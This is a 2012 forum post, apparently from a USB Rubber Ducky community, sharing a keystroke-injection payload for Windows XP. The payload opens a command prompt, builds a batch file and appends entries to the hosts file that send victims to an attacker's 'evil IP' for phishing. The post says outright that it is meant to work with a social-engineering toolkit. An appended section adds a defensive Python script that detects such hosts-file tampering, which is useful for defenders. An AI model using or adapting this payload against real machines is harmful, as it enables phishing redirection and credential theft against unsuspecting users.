skimpniff
Posted February 22, 2012

Based on the original script by Koryusai-Kun written for Win7.

I take minimal credit for this, I only took a great script and modified it for XP.

Darren, how do we get new payloads onto the GitHub site? Through you or is there a more direct way?

REM Author: .:skimpniff:.
REM Based on the original script by Koryusai-Kun written for Win7
REM Modified for use on WinXP
REM Description: Used for phishing, it adds IPs of your choosing to the hosts file on Windows
REM Description: so when the user types the website into their web browser it redirects them
REM Description: to your evil IP. Works perfectly in conjunction with SET.
REM Description: Don't forget to add both versions, with and without the www prefix.
GUI r
DELAY 600
STRING cmd
DELAY 400
STRING cd %WINDIR%\system32\drivers\etc\
DELAY 400
STRING copy con inject.bat
DELAY 400
ENTER
DELAY 400
STRING SET NEWLINE=^& echo.
ENTER
DELAY 400
STRING FIND /C /I "WEBSITE" %WINDIR%\system32\drivers\etc\hosts
ENTER
DELAY 400
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^EVIL.IP.ADDRESS WEBSITE>>%WINDIR%\system32\drivers\etc\hosts
ENTER
STRING FIND /C /I "www.WEBSITE" %WINDIR%\system32\drivers\etc\hosts
ENTER
DELAY 400
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^EVIL.IP.ADDRESS www.WEBSITE>>%WINDIR%\system32\drivers\etc\hosts
ENTER
DELAY 400
CONTROL z
ENTER
DELAY 400
STRING inject.bat
ENTER
DELAY 600
STRING exit
ENTER

Edited February 17, 2013 by midnitesnake
formatting
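A defender-side check for the change this payload makes, as an added example that is not part of the original post: it parses hosts-file text and reports any entry that maps a watched domain, or one of its subdomains, to an address that is neither loopback nor unspecified. The sample file, the watched domain and the function names are constructed for illustration.

```python
import ipaddress

# Constructed sample: a default-looking hosts file plus two appended entries of
# the kind the payload writes (documentation-range IP, placeholder domain).
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost

203.0.113.7 example.com
203.0.113.7 www.example.com
0.0.0.0 ads.tracker.test   # local blocklist entry
"""

def parse_hosts(text):
    """Yield (line_no, ip, hostname) for every mapping in hosts-file text."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        fields = raw.split("#", 1)[0].split()   # drop comments, split on whitespace
        if len(fields) < 2:
            continue                            # blank, comment-only or incomplete line
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                            # first field is not an IP address
        for name in fields[1:]:                 # one line may carry several aliases
            yield line_no, ip, name.lower().rstrip(".")

def audit_hosts(text, watched):
    """Return (line_no, ip, hostname) for watched domains pinned to a remote address."""
    watched = {d.lower() for d in watched}
    findings = []
    for line_no, ip, name in parse_hosts(text):
        if ip.is_loopback or ip.is_unspecified:
            continue                            # localhost and sinkhole-style entries
        if any(name == d or name.endswith("." + d) for d in watched):
            findings.append((line_no, str(ip), name))
    return findings

if __name__ == "__main__":
    # On a live host, read %WINDIR%\system32\drivers\etc\hosts instead of the sample.
    for line_no, ip, name in audit_hosts(SAMPLE_HOSTS, ["example.com"]):
        print(f"hosts line {line_no}: {name} -> {ip}")
```

A leftover inject.bat in %WINDIR%\system32\drivers\etc\ is a second artifact of this payload worth checking for alongside the hosts entries.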